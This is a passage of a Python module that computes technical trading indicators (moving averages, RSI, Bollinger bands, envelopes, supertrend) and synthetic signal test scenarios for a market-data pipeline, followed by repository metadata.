1})\n\n elif indicator == \"sma\":\n seq = 10\n if \"window_size\" in parameters:\n seq = parameters[\"window_size\"]\n if isinstance(seq, str):\n seq = int(seq)\n df[\"sma\"+ suffix] = TA.SMA(stock, seq).copy()\n\n elif indicator == \"ema\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n # df[\"ema\"+ suffix] = TA.EMA(stock, period = period).copy()\n df[\"ema\"+ suffix] = ta.trend.ema_indicator(close=df['close'], window=period).copy()\n\n elif indicator == 'willr':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df['willr'] = ta.momentum.williams_r(high=df['high'], 
low=df['low'], close=df['close'], lbp=period).copy()\n\n elif indicator == 'willr_trend':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['willr_trend'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n df['willr_trend' + suffix] = df['willr_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"willr_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'willr_trend' + suffix, predict_window)\n\n df[\"willr_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == \"wma\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df[\"wma\"+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n seq = int(sma_parsed[0])\n df[\"sma_\"+str(seq)+ suffix] = TA.SMA(stock, seq).copy()\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n period = int(ema_parsed[0])\n df[\"ema_\"+str(period)+ suffix] = TA.EMA(stock, period = period).copy()\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n period = int(wma_parsed[0])\n df[\"wma_\"+str(period)+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif slope_parsed != None and slope_parsed[0].isdigit():\n period = int(slope_parsed[0])\n df[\"slope_\"+str(period)+ suffix] = df[\"close\"].rolling(window=period).apply(lambda x: np.polyfit(range(len(x)), x, 1)[0])\n\n elif indicator == 'macd':\n df['macd' + suffix] = stock.get('macd').copy() # from stockstats\n #df['macd'] = TA.MACD(stock)['MACD'].copy() # from finta\n\n elif indicator == 'macds':\n df['macds' + suffix] = stock.get('macds').copy() # from stockstats\n\n elif indicator == 'macdh':\n df['macdh' + suffix] = stock.get('macdh').copy() # from stockstats\n\n elif indicator == 'bbands':\n bbands = TA.BBANDS(stock).copy()\n df = pd.concat([df, bbands], axis = 1)\n df.rename(columns={'BB_UPPER': 'bb_upper' + suffix}, inplace=True)\n df.rename(columns={'BB_MIDDLE': 'bb_middle' + suffix}, inplace=True)\n df.rename(columns={'BB_LOWER': 'bb_lower' + suffix}, inplace=True)\n\n elif indicator == 'rsi':\n rsi_window = 14\n if \"window_size\" in parameters:\n rsi_window = parameters[\"window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n df['rsi' + suffix] = ta.momentum.rsi(close=df[\"close\"], window=rsi_window)\n\n elif indicator == 'stoch_rsi':\n rsi_window = 14\n smooth_k = 3\n smooth_d = 3\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n df['stoch_rsi' + suffix] = ta.momentum.stochrsi(close=df[\"close\"]\n , window=rsi_window) * 100\n df['stoch_rsi_k' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n elif indicator == 'stoch_rsi_pred':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n \n predict_window = 4\n if \"pred_window_size\" 
in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_pred' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"], window=rsi_window).stochrsi() * 100\n df['stoch_rsi_pred' + suffix] = df['stoch_rsi_pred' + suffix].shift(-1)\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_pred' + suffix, predict_window)\n if predict_val < 0:\n predict_val = 0\n elif predict_val > 100:\n predict_val = 100\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = predict_val\n\n elif indicator == 'stoch_rsi_trend':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi() * 100\n df['stoch_rsi_k_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n df['stoch_rsi_trend' + suffix] = df['stoch_rsi_trend' + suffix].shift(-1)\n df['stoch_rsi_k_trend' + suffix] = df['stoch_rsi_k_trend' + suffix].shift(-1)\n df['stoch_rsi_d_trend' + suffix] = df['stoch_rsi_d_trend' + suffix].shift(-1)\n\n df.at[df.index[-1], \"stoch_rsi_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_trend' + suffix, predict_window)\n df[\"stoch_rsi_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_k_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_k_trend' + suffix, predict_window)\n df[\"stoch_rsi_k_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_d_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_d_trend' + suffix, predict_window)\n df[\"stoch_rsi_d_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'atr':\n atr_window = 14\n if \"window_size\" in parameters:\n atr_window = parameters[\"window_size\"]\n if isinstance(atr_window, str):\n atr_window = int(atr_window)\n df['atr' + suffix] = ta.volatility.AverageTrueRange(high=df[\"high\"], low=df[\"low\"], close=df[\"close\"], window=atr_window).average_true_range()\n\n elif indicator == 'ao':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n\n df['ao'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n \n elif indicator == 'ao_trend':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = 
int(ao_window_2)\n        \n            predict_window = 4\n            if \"pred_window_size\" in parameters:\n                predict_window = parameters[\"pred_window_size\"]\n                if isinstance(predict_window, str):\n                    predict_window = int(predict_window)\n\n            df['ao_trend' + suffix] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n            df['ao_trend' + suffix] = df['ao_trend' + suffix].shift(-1)\n            df.at[df.index[-1], \"ao_trend\" + suffix] = 0\n            predict_val, coef = utils.predict_next_LinearRegression(df, 'ao_trend' + suffix, predict_window)\n            \n            df[\"ao_trend\" + suffix] = utils.discret_coef(coef)\n\n        elif indicator == 'bollinger':\n            bol_window = 100\n            if \"window_size\" in parameters:\n                bol_window = parameters[\"window_size\"]\n                if isinstance(bol_window, str):\n                    bol_window = int(bol_window)\n            bol_std = 2.25\n            if \"bol_std\" in parameters:\n                bol_std = parameters[\"bol_std\"]\n                if isinstance(bol_std, str):\n                    bol_std = float(bol_std)\n            long_ma_window = 500\n\n            bol_band = ta.volatility.BollingerBands(close=df[\"close\"], window=bol_window, window_dev=bol_std)\n            df[\"lower_band\"+ suffix] = bol_band.bollinger_lband()\n            df[\"higher_band\"+ suffix] = bol_band.bollinger_hband()\n            df[\"ma_band\"+ suffix] = bol_band.bollinger_mavg()\n            df['long_ma' + suffix] = ta.trend.sma_indicator(close=df['close'], window=long_ma_window)\n\n            df['bollinger' + suffix] = True # bollinger indicator trigger\n\n        elif indicator == 'envelope':\n            envelope_window = 5\n            if \"ma_window_size\" in parameters:\n                envelope_window = parameters[\"ma_window_size\"]\n                if isinstance(envelope_window, str):\n                    envelope_window = int(envelope_window)\n\n            ma = \"sma\"\n            if \"ma\" in parameters:\n                ma = parameters[\"ma\"]\n                if not isinstance(ma, str):\n                    ma = \"sma\"\n\n            ma_offset_1 = 3\n            ma_offset_2 = 5\n            ma_offset_3 = 7\n            if \"ma_offset_1\" in parameters:\n                ma_offset_1 = parameters[\"ma_offset_1\"]\n                if isinstance(ma_offset_1, str):\n                    ma_offset_1 = float(ma_offset_1)\n            if \"ma_offset_2\" in parameters:\n                ma_offset_2 = parameters[\"ma_offset_2\"]\n                if isinstance(ma_offset_2, str):\n                    ma_offset_2 = float(ma_offset_2)\n            if \"ma_offset_3\" in parameters:\n                ma_offset_3 = parameters[\"ma_offset_3\"]\n                if isinstance(ma_offset_3, str):\n                    ma_offset_3 = float(ma_offset_3)\n\n            if ma == \"sma\":\n                df[\"ma_base\"+ suffix] = ta.trend.SMAIndicator(close=df[\"close\"], window=envelope_window).sma_indicator()\n                # df[\"ma_base\"+ suffix] = ta.trend.sma_indicator(close=df[\"close\"], window=envelope_window)\n                # df[\"ma_base\"+ suffix] = TA.SMA(df, envelope_window, \"close\")\n\n            predict_val, coef = utils.predict_next_LinearRegression(df, \"ma_base\"+ suffix, envelope_window)\n            df.at[df.index[-1], \"ma_base\" + suffix] = predict_val\n\n            df[\"envelope_long_1\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n            df[\"envelope_long_2\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n            df[\"envelope_long_3\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n            df[\"envelope_short_1\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n            df[\"envelope_short_2\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n            df[\"envelope_short_3\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n            df['envelope' + suffix] = True # envelope indicator trigger\n\n        elif indicator == 'synthetic_bollinger':\n            df.reset_index(inplace=True)\n            # TEST SCENARIO\n            df['close'] = 10\n            df[\"lower_band\"+ 
suffix] = 9\n            df[\"higher_band\"+ suffix] = 11\n            df[\"ma_band\"+ suffix] = 9.5\n            df[\"long_ma\"+ suffix] = 7\n\n            t = 1000 + 50\n            t_plus = 25\n            df.at[t, \"close\"] = df[\"higher_band\"+ suffix].iloc[t] + 0.01\n            # OPEN LONG\n            df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1.5, df['close'])\n            # CLOSE LONG\n            t = t + t_plus\n            df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['ma_band' + suffix])\n\n            # OPEN SHORT\n            t = t + t_plus\n            df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.6, df['lower_band' + suffix])\n            df['long_ma' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.3, df['long_ma' + suffix])\n\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n            t = t + t_plus\n            # CLOSE SHORT\n            df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 2.5, df['ma_band' + suffix])\n\n            # OPEN LONG\n            t = t + t_plus\n            df['long_ma' + suffix] = np.where(df.index >= t, df[\"close\"] - 0.3, df['long_ma' + suffix])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n            # CLOSE LONG\n            t = t + t_plus\n            df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 2, df['ma_band' + suffix])\n\n            t = t + t_plus\n            df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 4, df['higher_band' + suffix])\n\n            # OPEN SHORT\n            t = t + t_plus\n            df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 1, df['lower_band' + suffix])\n            t = t + t_plus\n            df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['lower_band' + suffix])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n            # CLOSE SHORT BY MA_BAND ALREADY BELOW CLOSE\n\n            # OPEN LONG\n            t = t + t_plus\n            df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] - 4, df['higher_band' + suffix])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n            t = t + t_plus\n            df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n\n            # CLOSE LONG\n            t = t + t_plus\n            df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.5, df['ma_band' + suffix])\n\n            # END OF SCENARIO\n            df.set_index(['timestamp'], inplace=True, drop=True)\n            df = utils.get_n_columns(df, [\"ma_band\"+ suffix, \"lower_band\"+ suffix, \"higher_band\"+ suffix, \"close\"], 1)\n\n            df['syntheticbollinger' + suffix] = True # bollinger indicator trigger\n\n        elif indicator == 'cci_30':\n            df['cci_30' + suffix] = stock.get('cci_30').copy()\n        \n        elif indicator == 'dx_30':\n            
df['dx_30' + suffix] = stock.get('dx_30').copy()\n        \n        elif indicator == 'williams_%r':\n            df['williams_%r' + suffix] = TA.WILLIAMS(stock).copy()\n\n        elif indicator == 'stoch_%k':\n            df['stoch_%k' + suffix] = TA.STOCH(stock).copy()\n\n        elif indicator == 'stoch_%d':\n            df['stoch_%d' + suffix] = TA.STOCHD(stock).copy()\n        \n        elif indicator == 'er':\n            df['er' + suffix] = TA.ER(stock).copy()\n        \n        elif indicator == 'stc':\n            df['stc' + suffix] = TA.STC(stock).copy()\n        \n        elif indicator == 'adx':\n            df['adx' + suffix] = TA.ADX(stock).copy()\n        \n        elif indicator == 'roc':\n            df['roc' + suffix] = TA.ROC(stock).copy()\n\n        elif indicator == 'mom':\n            df['mom' + suffix] = TA.MOM(stock).copy()\n\n        elif indicator == 'simple_rtn':\n            df['simple_rtn' + suffix] = df['close'].pct_change()\n\n        elif indicator == 'labeling':\n            df = flabeling.data_labeling(df, params)\n\n        elif indicator.startswith('tv_'):\n            df[indicator] = tv.get_recommendation(df, indicator, params)\n\n        # shift feature: column_shift_nb ex: close_shift_5\n        elif '_shift_' in indicator:\n            lst_split = indicator.split(\"_\")\n            df[indicator+ suffix] = df[lst_split[0]].shift(int(lst_split[2]), axis=0)\n\n        elif indicator == 'vsa':\n            days = [1, 2, 3, 5, 20, 40, 60]\n            df = vsa.create_bunch_of_vsa_features(df, days)\n            df['outcomes_vsa' + suffix] = df.close.pct_change(-1)\n\n        elif indicator == \"super_trend_direction\":\n            st = supertrend.SuperTrend(\n                df['high'], \n                df['low'], \n                df['close'], \n                15, # self.st_short_atr_window\n                5 # self.st_short_atr_multiplier\n            )\n            \n            df['super_trend_direction' + suffix] = st.super_trend_direction()\n            #df['super_trend_direction'] = df['super_trend_direction'].shift(1)\n\n        elif indicator == \"super_reversal\":\n            short_ema_window = 5\n            long_ema_window = 15\n            # -- Populate indicators --\n            super_trend = supertrend.SuperTrend(\n                df['high'],\n                df['low'],\n                df['close'],\n                long_ema_window,\n                short_ema_window\n            )\n            df['super_trend_direction' + suffix] = super_trend.super_trend_direction()\n            df['ema_short' + suffix] = ta.trend.ema_indicator(close=df['close'], window=short_ema_window)\n            df['ema_long' + suffix] = ta.trend.ema_indicator(close=df['close'], window=long_ema_window)\n\n            df = utils.get_n_columns(df, [\"super_trend_direction\"+ suffix, \"ema_short\"+ suffix, \"ema_long\"+ suffix], 1)\n            df['superreversal' + suffix] = True # super_reversal indicator trigger\n            df['super_reversal' + suffix] = True # super_reversal indicator trigger\n\n        elif indicator == 'syntheticsuperreversal':\n            df.reset_index(inplace=True)\n            # TEST SCENARIO\n            df['close'] = 5\n            df[\"high\"] = 10\n            df[\"low\"] = 17\n            df[\"n1_ema_short\"+ suffix] = 14\n            df[\"n1_ema_long\"+ suffix] = 15\n            df[\"n1_super_trend_direction\"+ suffix] = False\n\n            # OPEN LONG AT t\n            t = 100 + 400\n            df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] + 1, df['n1_ema_short' + suffix])\n            df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n            df['low'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] - 1, df['low'])\n\n            df['close'] = np.where(df.index >= t + 10, df[\"close\"] + 1, df['close'])\n\n            # CLOSING SHORT\n            t = t + 100\n            df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] - 1, df['n1_ema_short' + suffix])\n            df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n            df['high'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] + 5, df['high'])\n\n            # CLOSING SHORT\n            t = t + 100\n            df['n1_ema_short' + suffix] = 
np.where(df.index >= t, 20, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n # OPENING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 25, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] +1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df['n1_ema_short' + suffix] +2, df['high'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] - 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 30, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n df[\"ema_short\"+ suffix] = df[\"n1_ema_short\"+ suffix]\n df[\"ema_long\"+ suffix] = df[\"n1_ema_long\"+ suffix]\n df[\"super_trend_direction\"+ suffix] = df[\"n1_super_trend_direction\"+ suffix]\n\n df['syntheticsuperreversal' + suffix] = True\n\n df.set_index(['timestamp'], inplace=True, drop=True)\n\n # keep only the requested indicators\n if keep_only_requested_indicators:\n for column in list(df.columns):\n if column not in keep_indicators:\n df.drop(columns=[column], inplace=True)\n\n # drop \"timestamp\" as it is redundant with index\n if \"timestamp\" in list(df.columns):\n df.drop(columns=[\"timestamp\"], inplace=True)\n \n return df\n \ndef make_date(df, date_field):\n \"Make sure `df[date_field]` is of the right date type.\"\n field_dtype = df[date_field].dtype\n if isinstance(field_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n field_dtype = np.datetime64\n if not np.issubdtype(field_dtype, np.datetime64):\n df[date_field] = pd.to_datetime(df[date_field], infer_datetime_format=True)\n\ndef add_temporal_indicators(df, field_name, time=False):\n \"Helper function that adds columns relevant to a date in the column `field_name` of `df`.\"\n\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n\n if field_name not in df.columns and field_name != df.index.name:\n print(\"[add_temporal_indicators] {} is not present among the columns {} or in the index {}\".format(field_name, df.columns, df.index.name))\n return df\n\n # if the datefield is the index of the dataframe, we create a temporary column\n field_to_drop = False\n if field_name == df.index.name:\n field_name = 'DateTmp'\n df[field_name] = df.index\n field_to_drop = True\n\n make_date(df, field_name)\n\n field = df[field_name]\n prefix = \"\" #ifnone(prefix, re.sub('[Dd]ate$', '', field_name))\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear', 'Is_month_end', 'Is_month_start',\n 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n # Pandas removed `dt.week` in v1.1.10\n week = field.dt.isocalendar().week.astype(field.dt.day.dtype) if hasattr(field.dt, 
'isocalendar') else field.dt.week\n for n in attr: df[prefix + n] = getattr(field.dt, n.lower()) if n != 'Week' else week\n mask = ~field.isna()\n df[prefix + 'Elapsed'] = np.where(mask, field.values.astype(np.int64) // 10 ** 9, np.nan)\n if field_to_drop: df.drop(field_name, axis=1, inplace=True)\n\n return df\n\ndef remove_features(df, features):\n for feature in features:\n try:\n df.drop(feature, axis=1, inplace=True)\n except KeyError as feature:\n print(\"{}. Columns are {}\".format(feature, df.columns))\n return df\n\ndef normalize_column_headings(df):\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n return df\n\ndef get_trend_info(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend_1d'] = tmp['trend_1d'].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 1), 1, 0)\n\n # how many times the trend is up\n trend_counted = tmp['trend_1d'].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return trend_ratio, true_positive, true_negative, false_positive, false_negative\n\ndef get_stats_for_trend_up(df, n_forward_days):\n tmp = df.copy()\n\n indicator = \"trend_\"+str(n_forward_days)+\"d\"\n if indicator not in tmp.columns:\n tmp = compute_indicators(tmp, [indicator])\n\n # how many times the trend is up for d+n_forward_days\n trend_counted = tmp[indicator].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n return trend_ratio\n\ndef get_stats_on_trend_today_equals_trend_tomorrow(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend'] = tmp[\"trend_1d\"].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 1), 1, 0)\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return true_positive, true_negative, false_positive, false_negative\n\ndef shift(df, indicator, shift):\n if isinstance(shift, str):\n shift = int(shift)\n \n df[indicator] = df[indicator].shift(shift)\n return df\n\ndef remove_missing_values(df):\n df['inf'] = 0\n for col in df.columns:\n df['inf'] 
= np.where((df[col] == np.inf) | (df[col] == -np.inf), 1, df['inf'])\n\n df = df.drop(df[df.inf == 1].index)\n df = df.drop(['inf'], axis=1)\n\n df.replace([np.inf, -np.inf], np.nan)\n # Drop the NaNs\n df.dropna(axis=0, how='any', inplace=True)\n\n return df\n\n\ndef remove_duplicates(df):\n df.drop_duplicates(inplace=True)\n return df\n", "repo_name": "cedfactory/fdp", "sub_path": "src/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 38151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "parse.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 16, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "stockstats.StockDataFrame.retype", "line_number": 167, "usage_type": "call"}, {"api_name": "stockstats.StockDataFrame", "line_number": 167, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 178, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 215, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 216, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 217, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 218, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 219, "usage_type": "call"}, {"api_name": "finta.TA.SMA", "line_number": 232, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 232, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 241, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 249, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 249, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 264, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 264, "usage_type": "attribute"}, {"api_name": "finta.TA.WMA", "line_number": 278, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 278, "usage_type": "name"}, {"api_name": "finta.TA.SMA", "line_number": 282, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 282, "usage_type": "name"}, {"api_name": "finta.TA.EMA", "line_number": 286, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 286, "usage_type": "name"}, {"api_name": "finta.TA.WMA", "line_number": 290, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 290, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 294, "usage_type": "call"}, {"api_name": "finta.TA.BBANDS", "line_number": 307, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 308, "usage_type": "call"}, {"api_name": "ta.momentum.rsi", "line_number": 319, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 319, "usage_type": "attribute"}, {"api_name": 